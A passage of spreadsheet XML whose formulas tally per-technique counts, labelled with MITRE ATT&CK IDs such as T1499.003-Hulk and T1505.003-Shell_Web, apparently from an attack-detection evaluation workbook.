      </c>
      <c r="Z78" s="288">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!BZ78,"")</f>
        <v>11</v>
      </c>
      <c r="AA78" s="392">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!CB78,"")</f>
        <v>11</v>
      </c>
      <c r="AB78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!CD78,"")</f>
        <v>3</v>
      </c>
      <c r="AC78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!CE78,"")</f>
        <v>11</v>
      </c>
      <c r="AD78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF(Z78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CF78,"")</f>
        <v>28408</v>
      </c>
      <c r="AF78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CH78,"")</f>
        <v>15712</v>
      </c>
      <c r="AG78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CJ78,"")</f>
        <v>5</v>
      </c>
      <c r="AH78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CK78,"")</f>
        <v>14112</v>
      </c>
      <c r="AI78" s="287">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($AE78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ78" s="292">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CL78,"")</f>
        <v>0</v>
      </c>
      <c r="AK78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CN78,"")</f>
        <v>0</v>
      </c>
      <c r="AL78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CP78,"")</f>
        <v>0</v>
      </c>
      <c r="AM78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CQ78,"")</f>
        <v>0</v>
      </c>
      <c r="AN78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($AJ78=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CR78,"")</f>
        <v>0</v>
      </c>
      <c r="AP78" s="322">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CT78,"")</f>
        <v>0</v>
      </c>
      <c r="AQ78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CV78,"")</f>
        <v>0</v>
      </c>
      <c r="AR78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!$CW78,"")</f>
        <v>0</v>
      </c>
      <c r="AS78" s="287">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($AO78=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT78" s="288">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!CX78,"")</f>
        <v>1590</v>
      </c>
      <c r="AU78" s="392">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!CZ78,"")</f>
        <v>1589</v>
      </c>
      <c r="AV78" s="4">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!DB78,"")</f>
        <v>1</v>
      </c>
      <c r="AW78" s="20">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",'(A) Ataques'!DC78,"")</f>
        <v>1589</v>
      </c>
      <c r="AX78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($AT78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY78" s="469">
        <f>'(A) Ataques'!LU78+'(A) Ataques'!MA78+'(A) Ataques'!MG78+'(A) Ataques'!MM78+'(A) Ataques'!MS78</f>
        <v>0</v>
      </c>
      <c r="AZ78" s="510">
        <f>'(A) Ataques'!LW78+'(A) Ataques'!MC78+'(A) Ataques'!MI78+'(A) Ataques'!MO78+'(A) Ataques'!MU78</f>
        <v>0</v>
      </c>
      <c r="BA78" s="471">
        <f>'(A) Ataques'!LY78+'(A) Ataques'!ME78+'(A) Ataques'!MK78+'(A) Ataques'!MQ78+'(A) Ataques'!MW78</f>
        <v>0</v>
      </c>
      <c r="BB78" s="471">
        <f>'(A) Ataques'!LQ78</f>
        <v>0</v>
      </c>
      <c r="BC78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($AY78=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD78" s="469">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!LL78,"")</f>
        <v>53713</v>
      </c>
      <c r="BE78" s="510">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!LM78,"")</f>
        <v>53713</v>
      </c>
      <c r="BF78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!LN78,"")</f>
        <v>0</v>
      </c>
      <c r="BG78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!LO78,"")</f>
        <v>5</v>
      </c>
      <c r="BH78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!LS78,"")</f>
        <v>26831</v>
      </c>
      <c r="BI78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($BD78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ78" s="469">
        <f>'(A) Ataques'!OL78+'(A) Ataques'!OR78+'(A) Ataques'!OX78+'(A) Ataques'!PD78+'(A) Ataques'!PJ78</f>
        <v>27834</v>
      </c>
      <c r="BK78" s="510">
        <f>'(A) Ataques'!ON78+'(A) Ataques'!OT78+'(A) Ataques'!OZ78+'(A) Ataques'!PF78+'(A) Ataques'!PL78</f>
        <v>26922</v>
      </c>
      <c r="BL78" s="471">
        <f>'(A) Ataques'!OP78+'(A) Ataques'!OV78+'(A) Ataques'!PB78+'(A) Ataques'!PH78+'(A) Ataques'!PN78</f>
        <v>2</v>
      </c>
      <c r="BM78" s="495">
        <f>'(A) Ataques'!OH78</f>
        <v>26851</v>
      </c>
      <c r="BN78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($BJ78=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO78" s="469">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!OC78,"")</f>
        <v>27834</v>
      </c>
      <c r="BP78" s="510">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!OD78,"")</f>
        <v>26922</v>
      </c>
      <c r="BQ78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!OE78,"")</f>
        <v>2</v>
      </c>
      <c r="BR78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!OF78,"")</f>
        <v>1</v>
      </c>
      <c r="BS78" s="471">
        <f>IF('(A) Ataques'!$AP78&lt;&gt;"NO",'(A) Ataques'!OJ78,"")</f>
        <v>26851</v>
      </c>
      <c r="BT78" s="331">
        <f>IF('(A) Ataques'!$AK78&lt;&gt;"NO",IF($BO78=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="79" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A79" s="79">
        <f t="shared" si="1"/>
        <v>77</v>
      </c>
      <c r="B79" s="4">
        <f>IF('(A) Ataques'!AK79&lt;&gt;"NO",'(A) Ataques'!E79,"")</f>
        <v>48</v>
      </c>
      <c r="C79" s="6" t="str">
        <f>IF('(A) Ataques'!AK79&lt;&gt;"NO",IF('(A) Ataques'!M79="","",'(A) Ataques'!M79),"")</f>
        <v>T1499.003-Hulk</v>
      </c>
      <c r="D79" s="4" t="str">
        <f>IF('(A) Ataques'!AK79&lt;&gt;"NO",'(A) Ataques'!F79,"")</f>
        <v>T1499</v>
      </c>
      <c r="E79" s="286">
        <f>IF('(A) Ataques'!AK79&lt;&gt;"NO",'(A) Ataques'!AQ79,"")</f>
        <v>1802279</v>
      </c>
      <c r="F79" s="288">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!BB79,"")</f>
        <v>8140</v>
      </c>
      <c r="G79" s="392">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!BD79,"")</f>
        <v>4246</v>
      </c>
      <c r="H79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!BF79,"")</f>
        <v>1</v>
      </c>
      <c r="I79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!BG79,"")</f>
        <v>4246</v>
      </c>
      <c r="J79" s="530">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($F79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BH79,"")</f>
        <v>0</v>
      </c>
      <c r="L79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BJ79,"")</f>
        <v>0</v>
      </c>
      <c r="M79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BL79,"")</f>
        <v>0</v>
      </c>
      <c r="N79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BM79,"")</f>
        <v>0</v>
      </c>
      <c r="O79" s="532">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($K79=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P79" s="292">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BN79,"")</f>
        <v>8140</v>
      </c>
      <c r="Q79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BP79,"")</f>
        <v>4246</v>
      </c>
      <c r="R79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BR79,"")</f>
        <v>1</v>
      </c>
      <c r="S79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BS79,"")</f>
        <v>4246</v>
      </c>
      <c r="T79" s="530">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($P79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BT79,"")</f>
        <v>652208</v>
      </c>
      <c r="V79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BV79,"")</f>
        <v>29230</v>
      </c>
      <c r="W79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BX79,"")</f>
        <v>3</v>
      </c>
      <c r="X79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$BY79,"")</f>
        <v>14116</v>
      </c>
      <c r="Y79" s="532">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($U79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z79" s="288">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!BZ79,"")</f>
        <v>23</v>
      </c>
      <c r="AA79" s="392">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!CB79,"")</f>
        <v>23</v>
      </c>
      <c r="AB79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!CD79,"")</f>
        <v>2</v>
      </c>
      <c r="AC79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!CE79,"")</f>
        <v>23</v>
      </c>
      <c r="AD79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF(Z79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CF79,"")</f>
        <v>652231</v>
      </c>
      <c r="AF79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CH79,"")</f>
        <v>29253</v>
      </c>
      <c r="AG79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CJ79,"")</f>
        <v>5</v>
      </c>
      <c r="AH79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CK79,"")</f>
        <v>14116</v>
      </c>
      <c r="AI79" s="287">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($AE79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ79" s="292">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CL79,"")</f>
        <v>0</v>
      </c>
      <c r="AK79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CN79,"")</f>
        <v>0</v>
      </c>
      <c r="AL79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CP79,"")</f>
        <v>0</v>
      </c>
      <c r="AM79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CQ79,"")</f>
        <v>0</v>
      </c>
      <c r="AN79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($AJ79=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CR79,"")</f>
        <v>0</v>
      </c>
      <c r="AP79" s="322">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CT79,"")</f>
        <v>0</v>
      </c>
      <c r="AQ79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CV79,"")</f>
        <v>0</v>
      </c>
      <c r="AR79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!$CW79,"")</f>
        <v>0</v>
      </c>
      <c r="AS79" s="287">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($AO79=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT79" s="288">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!CX79,"")</f>
        <v>8140</v>
      </c>
      <c r="AU79" s="392">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!CZ79,"")</f>
        <v>4246</v>
      </c>
      <c r="AV79" s="4">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!DB79,"")</f>
        <v>1</v>
      </c>
      <c r="AW79" s="20">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",'(A) Ataques'!DC79,"")</f>
        <v>4246</v>
      </c>
      <c r="AX79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($AT79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY79" s="469">
        <f>'(A) Ataques'!LU79+'(A) Ataques'!MA79+'(A) Ataques'!MG79+'(A) Ataques'!MM79+'(A) Ataques'!MS79</f>
        <v>0</v>
      </c>
      <c r="AZ79" s="510">
        <f>'(A) Ataques'!LW79+'(A) Ataques'!MC79+'(A) Ataques'!MI79+'(A) Ataques'!MO79+'(A) Ataques'!MU79</f>
        <v>0</v>
      </c>
      <c r="BA79" s="471">
        <f>'(A) Ataques'!LY79+'(A) Ataques'!ME79+'(A) Ataques'!MK79+'(A) Ataques'!MQ79+'(A) Ataques'!MW79</f>
        <v>0</v>
      </c>
      <c r="BB79" s="471">
        <f>'(A) Ataques'!LQ79</f>
        <v>0</v>
      </c>
      <c r="BC79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($AY79=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD79" s="469">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!LL79,"")</f>
        <v>631148</v>
      </c>
      <c r="BE79" s="510">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!LM79,"")</f>
        <v>631148</v>
      </c>
      <c r="BF79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!LN79,"")</f>
        <v>0</v>
      </c>
      <c r="BG79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!LO79,"")</f>
        <v>5</v>
      </c>
      <c r="BH79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!LS79,"")</f>
        <v>329377</v>
      </c>
      <c r="BI79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($BD79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ79" s="469">
        <f>'(A) Ataques'!OL79+'(A) Ataques'!OR79+'(A) Ataques'!OX79+'(A) Ataques'!PD79+'(A) Ataques'!PJ79</f>
        <v>1807198</v>
      </c>
      <c r="BK79" s="510">
        <f>'(A) Ataques'!ON79+'(A) Ataques'!OT79+'(A) Ataques'!OZ79+'(A) Ataques'!PF79+'(A) Ataques'!PL79</f>
        <v>1089180</v>
      </c>
      <c r="BL79" s="471">
        <f>'(A) Ataques'!OP79+'(A) Ataques'!OV79+'(A) Ataques'!PB79+'(A) Ataques'!PH79+'(A) Ataques'!PN79</f>
        <v>2</v>
      </c>
      <c r="BM79" s="495">
        <f>'(A) Ataques'!OH79</f>
        <v>1084579</v>
      </c>
      <c r="BN79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($BJ79=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO79" s="469">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!OC79,"")</f>
        <v>1807198</v>
      </c>
      <c r="BP79" s="510">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!OD79,"")</f>
        <v>1089180</v>
      </c>
      <c r="BQ79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!OE79,"")</f>
        <v>2</v>
      </c>
      <c r="BR79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!OF79,"")</f>
        <v>1</v>
      </c>
      <c r="BS79" s="471">
        <f>IF('(A) Ataques'!$AP79&lt;&gt;"NO",'(A) Ataques'!OJ79,"")</f>
        <v>1084579</v>
      </c>
      <c r="BT79" s="331">
        <f>IF('(A) Ataques'!$AK79&lt;&gt;"NO",IF($BO79=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="80" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A80" s="79">
        <f t="shared" si="1"/>
        <v>78</v>
      </c>
      <c r="B80" s="4">
        <f>IF('(A) Ataques'!AK80&lt;&gt;"NO",'(A) Ataques'!E80,"")</f>
        <v>49</v>
      </c>
      <c r="C80" s="6" t="str">
        <f>IF('(A) Ataques'!AK80&lt;&gt;"NO",IF('(A) Ataques'!M80="","",'(A) Ataques'!M80),"")</f>
        <v>T1505.003-Shell_Web</v>
      </c>
      <c r="D80" s="4" t="str">
        <f>IF('(A) Ataques'!AK80&lt;&gt;"NO",'(A) Ataques'!F80,"")</f>
        <v>T1505</v>
      </c>
      <c r="E80" s="286">
        <f>IF('(A) Ataques'!AK80&lt;&gt;"NO",'(A) Ataques'!AQ80,"")</f>
        <v>3</v>
      </c>
      <c r="F80" s="288">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!BB80,"")</f>
        <v>2</v>
      </c>
      <c r="G80" s="392">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!BD80,"")</f>
        <v>1</v>
      </c>
      <c r="H80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!BF80,"")</f>
        <v>1</v>
      </c>
      <c r="I80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!BG80,"")</f>
        <v>1</v>
      </c>
      <c r="J80" s="530">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($F80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BH80,"")</f>
        <v>0</v>
      </c>
      <c r="L80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BJ80,"")</f>
        <v>0</v>
      </c>
      <c r="M80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BL80,"")</f>
        <v>0</v>
      </c>
      <c r="N80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BM80,"")</f>
        <v>0</v>
      </c>
      <c r="O80" s="532">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($K80=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P80" s="292">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BN80,"")</f>
        <v>2</v>
      </c>
      <c r="Q80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BP80,"")</f>
        <v>1</v>
      </c>
      <c r="R80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BR80,"")</f>
        <v>1</v>
      </c>
      <c r="S80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BS80,"")</f>
        <v>1</v>
      </c>
      <c r="T80" s="530">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($P80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BT80,"")</f>
        <v>2</v>
      </c>
      <c r="V80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BV80,"")</f>
        <v>1</v>
      </c>
      <c r="W80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BX80,"")</f>
        <v>1</v>
      </c>
      <c r="X80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$BY80,"")</f>
        <v>1</v>
      </c>
      <c r="Y80" s="532">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($U80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z80" s="288">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!BZ80,"")</f>
        <v>5</v>
      </c>
      <c r="AA80" s="392">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!CB80,"")</f>
        <v>3</v>
      </c>
      <c r="AB80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!CD80,"")</f>
        <v>3</v>
      </c>
      <c r="AC80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!CE80,"")</f>
        <v>2</v>
      </c>
      <c r="AD80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF(Z80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CF80,"")</f>
        <v>7</v>
      </c>
      <c r="AF80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CH80,"")</f>
        <v>4</v>
      </c>
      <c r="AG80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CJ80,"")</f>
        <v>4</v>
      </c>
      <c r="AH80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CK80,"")</f>
        <v>3</v>
      </c>
      <c r="AI80" s="287">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($AE80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ80" s="292">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CL80,"")</f>
        <v>0</v>
      </c>
      <c r="AK80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CN80,"")</f>
        <v>0</v>
      </c>
      <c r="AL80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CP80,"")</f>
        <v>0</v>
      </c>
      <c r="AM80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CQ80,"")</f>
        <v>0</v>
      </c>
      <c r="AN80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($AJ80=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CR80,"")</f>
        <v>0</v>
      </c>
      <c r="AP80" s="322">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CT80,"")</f>
        <v>0</v>
      </c>
      <c r="AQ80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CV80,"")</f>
        <v>0</v>
      </c>
      <c r="AR80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!$CW80,"")</f>
        <v>0</v>
      </c>
      <c r="AS80" s="287">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($AO80=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT80" s="288">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!CX80,"")</f>
        <v>2</v>
      </c>
      <c r="AU80" s="392">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!CZ80,"")</f>
        <v>1</v>
      </c>
      <c r="AV80" s="4">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!DB80,"")</f>
        <v>1</v>
      </c>
      <c r="AW80" s="20">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",'(A) Ataques'!DC80,"")</f>
        <v>1</v>
      </c>
      <c r="AX80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($AT80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY80" s="469">
        <f>'(A) Ataques'!LU80+'(A) Ataques'!MA80+'(A) Ataques'!MG80+'(A) Ataques'!MM80+'(A) Ataques'!MS80</f>
        <v>3</v>
      </c>
      <c r="AZ80" s="510">
        <f>'(A) Ataques'!LW80+'(A) Ataques'!MC80+'(A) Ataques'!MI80+'(A) Ataques'!MO80+'(A) Ataques'!MU80</f>
        <v>2</v>
      </c>
      <c r="BA80" s="471">
        <f>'(A) Ataques'!LY80+'(A) Ataques'!ME80+'(A) Ataques'!MK80+'(A) Ataques'!MQ80+'(A) Ataques'!MW80</f>
        <v>2</v>
      </c>
      <c r="BB80" s="471">
        <f>'(A) Ataques'!LQ80</f>
        <v>2</v>
      </c>
      <c r="BC80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($AY80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD80" s="469">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!LL80,"")</f>
        <v>7</v>
      </c>
      <c r="BE80" s="510">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!LM80,"")</f>
        <v>6</v>
      </c>
      <c r="BF80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!LN80,"")</f>
        <v>2</v>
      </c>
      <c r="BG80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!LO80,"")</f>
        <v>2</v>
      </c>
      <c r="BH80" s="471">
        <f>IF('(A) Ataques'!$AP80&lt;&gt;"NO",'(A) Ataques'!LS80,"")</f>
        <v>3</v>
      </c>
      <c r="BI80" s="331">
        <f>IF('(A) Ataques'!$AK80&lt;&gt;"NO",IF($BD80=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ80" s="469">
        <f>'(A) Ataques'!OL80+'(A) Ataques'!OR80+'(A) Ataques'!OX80+'(A) Ataques'!PD80+'(A) Ataques'!PJ80</f>
        <v>3</v>
      </c>
      <c r="BK80" s="510">
        <f>'(A) Ataques'!ON80+'(A) Ataques'!OT80+'(A) Ataques'!OZ80+'(A) Ataques'!PF80+'(A) Ataques'!PL80</f>
        <v>3</v>
      </c>
